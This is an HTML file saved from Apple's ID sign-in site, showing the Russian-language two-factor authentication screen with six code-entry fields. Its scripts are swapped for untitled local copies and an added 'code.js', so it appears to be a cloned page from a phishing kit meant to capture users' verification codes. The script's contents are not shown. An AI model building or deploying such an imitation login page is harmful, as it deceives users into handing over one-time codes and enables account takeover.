<!DOCTYPE html>
<!-- saved from url=(0371)https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-z1dnljxm-yn6q-u3d3-bcqq-qake2mce&iframeId=auth-z1dnljxm-yn6q-u3d3-bcqq-qake2mce&client_id=af1139274f266b22b68c2a3e7ad932cb3c0bbe854e13a79af78dcc73136882c3&redirect_uri=https://appleid.apple.com&response_type=code&response_mode=web_message&state=auth-z1dnljxm-yn6q-u3d3-bcqq-qake2mce&authVersion=latest -->
<html data-rtl="false" lang="ru" class="prefpane na-presentation">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title></title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">


    <link rel="stylesheet" href="./fonts(1)" type="text/css">


    <link rel="stylesheet" type="text/css" media="screen" href="./app.css">

    <script type="text/javascript" src="./common-header.js(1).Без названия"></script>


    <style type="text/css"></style>
    <style type="text/css"></style>
</head>

<body class="tk-body">
<div aria-hidden="true" style="font-family:&quot;SF Pro Icons&quot;; width: 0px; height: 0px; color: transparent;">.
</div>
<div aria-hidden="true" style="font-family:&quot;SF Pro Display&quot;; width: 0px; height: 0px; color: transparent;">.
</div>
<div class="si-body si-container container-fluid" id="content" data-theme="dark">
    <apple-auth app-loading-defaults="{appLoadingDefaults}" pmrpc-hook="{pmrpcHook}">
        <div class="widget-container  fade-in restrict-min-content  restrict-max-wh  fade-in " data-mode="inline"
             data-isiebutnotedge="false">
            <div id="step" class="si-step  ">
                <logo {hide-app-logo}="hideAppLogo" {show-fade-in}="showFadeIn">
                </logo>
                <div id="stepEl" class="   ">
                    <hsa2 suppress-iforgot="{suppressIforgot}" skip-trust-browser-step="{skipTrustBrowserStep}">
                        <div class="hsa2">
                            <verify-phone suppress-iforgot="{suppressIforgot}"
                                          {two-factor-verification-support-url}="twoFactorVerificationSupportUrl"
                                          {recovery-available}="recoveryAvailable"
                                          code-sent-to-phone="{codeSentToPhone}"
                                          last-code-sent-to-phone="{lastCodeSentToPhone}">
                                <div class="verify-phone fade-in ">
                                    <div>
                                        <app-title>
                                            <h1 tabindex="-1" class="si-container-title tk-callout  ">

                                                Двухфакторная аутентификация
                                            </h1>
                                        </app-title>
                                        <div class="sec-code-wrapper">
                                            <security-code length="{codeLength}" type="tel"
                                                           sr-context="Enter verification code. After entering the verification code, the page gets updated automatically."
                                                           localised-digit="Цифра" error-message="" split="true">
                                                <div class="security-code">
                                                    <idms-error-wrapper {disable-all-errors}="hasErrorLabel"
                                                                        {^error-type}="errorType"
                                                                        popover-auto-close="false"
                                                                        {^idms-error-wrapper-classes}="idmsErrorWrapperClasses"
                                                                        {has-errors-and-focus}="hasErrorsAndFocus"
                                                                        {show-error}="hasErrorsAndFocus"
                                                                        {error-message}="errorMessage"
                                                                        {parent-container}="parentContainer"
                                                                        {(enable-showing-errors)}="enableShowingErrors"
                                                                        error-input-id="idms-input-error-1648049350475-1"
                                                                        anchor-element="#security-code-wrap-1648049350475-1">
                                                        <div class="" id="idms-error-wrapper-1648049350475-0">

                                                            <div id="security-code-wrap-1648049350475-1"
                                                                 class="security-code-wrap security-code-6 split"
                                                                 localiseddigit="Цифра">
                                                                <div class="security-code-container force-ltr">
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char0"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Enter verification code. After entering the verification code, the page gets updated automatically. Цифра 1"
                                                                               placeholder="" tabindex="0">
                                                                    </div>
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char1"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Цифра 2" placeholder=""
                                                                               tabindex="1">
                                                                    </div>
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char2"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Цифра 3" placeholder=""
                                                                               tabindex="2">
                                                                    </div>
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char3"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Цифра 4" placeholder=""
                                                                               tabindex="3">
                                                                    </div>
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char4"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Цифра 5" placeholder=""
                                                                               tabindex="4">
                                                                    </div>
                                                                    <div class="field-wrap force-ltr ">
                                                                        <input maxlength="1" autocorrect="off"
                                                                               autocomplete="off" autocapitalize="off"
                                                                               spellcheck="false" type="tel" id="char5"
                                                                               class="form-control force-ltr form-textbox char-field"
                                                                               aria-label="Цифра 6" placeholder=""
                                                                               tabindex="5">
                                                                    </div>
                                                                </div>
                                                            </div>

                                                        </div>
                                                    </idms-error-wrapper>
                                                </div>
                                            </security-code>
                                        </div>
                                        <div class="si-info">
                                            <p>
                                                Сообщение с кодом проверки отправлено на Ваши устройства. Введите код,
                                                чтобы продолжить.
                                            </p>
                                        </div>
                                        <button aria-haspopup="dialog"
                                                class="button-link si-link ax-outline tk-subbody lite-theme-override other-option-popover-link"
                                                id="didnt-get-code" href="#">
                                            Не получили код проверки?
                                        </button>
                                        <div class="spinner-container verifying-code" id="verifying-code"></div>
                                        <div class="spinner-container sending-code" id="sending-code"></div>
                                    </div>
                                </div>
                            </verify-phone>
                        </div>
                    </hsa2>
                </div>
            </div>
            <div id="stocking" style="display:none !important;"></div>
        </div>
        <idms-modal wrap-class="full-page-error-wrapper " {(show)}="showfullPageError" auto-close="false">
        </idms-modal>
    </apple-auth>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
<script src="code.js"></script>
<script type="text/javascript" src="./initBootData.js.Без названия"></script>
<script type="text/javascript" src="./initLocalizationStrings.js.Без названия"></script>
<script type="text/javascript" src="./app.js.Без названия"></script>
<input type="hidden" id="fdcBrowserData"
       value="{&quot;U&quot;:&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36&quot;,&quot;L&quot;:&quot;ru-RU&quot;,&quot;Z&quot;:&quot;GMT+02:00&quot;,&quot;V&quot;:&quot;1.1&quot;,&quot;F&quot;:&quot;cla44j1e3NlY5BNlY5BSs5uQ084akJ.Tg7TmFxTgdQej2AQ0adPQSuXjodUW1BNnMk4JlVApNJaqbCJ9_QjA9zKqUkxGY5BNlYJNNlY5QB4bVNjMk.5K.&quot;}">
</body>
</html>